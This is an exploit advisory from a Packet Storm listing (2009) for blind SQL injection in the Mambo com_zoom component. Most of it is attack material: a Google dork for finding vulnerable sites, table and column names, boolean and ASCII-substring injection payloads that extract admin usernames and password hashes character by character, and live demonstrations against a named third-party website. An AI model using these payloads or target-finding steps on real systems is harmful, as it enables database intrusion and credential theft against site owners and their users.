Mambo Zoom Blind SQL Injection

2009-09-04T00:00:00
ID PACKETSTORM:80992
Type packetstorm
Reporter boom3rang
Modified 2009-09-04T00:00:00

Description

                                        
                                            ` Mambo component com_zoom (catid) Blind SQL injection [_][-][X]   
_ ___ _ ___ ___ ___ _____ __ ___ __ __ ___   
| |/ / || |/ __|___ / __| _ \ __\ \ / / |_ ) \ / \/ _ \   
| ' <| __ | (_ |___| (__| / _| \ \/\/ / / / () | () \_, /   
|_|\_\_||_|\___| \___|_|_\___| \_/\_/ /___\__/ \__/ /_/   
  
  
Red n'black i dress eagle on my chest.   
It's good to be an ALBANIAN Keep my head up high for that flag i die.   
Im proud to be an ALBANIAN  
###################################################################   
  
Author : boom3rang   
Contact : boom3rang[at]live.com   
Greetz : H!tm@N - KHG - cHs  
  
R.I.P redc00de   
-------------------------------------------------------------------   
  
Affected software description   
<name>zoom</name>  
<creationDate>20/01/2004</creationDate>  
<author>Mike de Boer</author>  
<authorEmail>mailme@mikedeboer.nl</authorEmail>  
<authorUrl>www.mikedeboer.nl</authorUrl>  
<version>2.0</version>   
-------------------------------------------------------------------   
  
[~] SQLi :   
  
http://www.TARGET.com/index.php?option=com_zoom&Itemid=0&catid=[SQLi]   
  
[~]Google Dork :   
  
inurl:com_zoom inurl:"imgid"   
  
-------------------------------------------------------------------   
  
[~] Table_NAME = mos_users  
[~] Column_NAME = username - password   
-------------------------------------------------------------------   
  
[~] Admin Path :   
  
http://www.TARGET.com/administrator  
  
===================================================================   
= POC =  
===================================================================   
  
  
[~] Live Demo:  
ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=1/* --> True  
ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=2/* --> False  
  
-------------------------------------------------------------------  
  
[~] ASCII   
index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96  
  
-------------------------------------------------------------------  
  
[~] Live Demo ASCII  
  
True  
http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96   
  
False  
http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>97  
  
Like we see, the first charter of username is 'a' char(97)=a  
Now you can change the second limit to find other charters, Good Luck...   
  
note:  
<name>zoom</name>  
<creationDate>20/01/2004</creationDate>  
<author>Mike de Boer</author>  
<authorEmail>mailme@mikedeboer.nl</authorEmail>  
<authorUrl>www.mikedeboer.nl</authorUrl>  
<version>2.0</version>  
  
  
`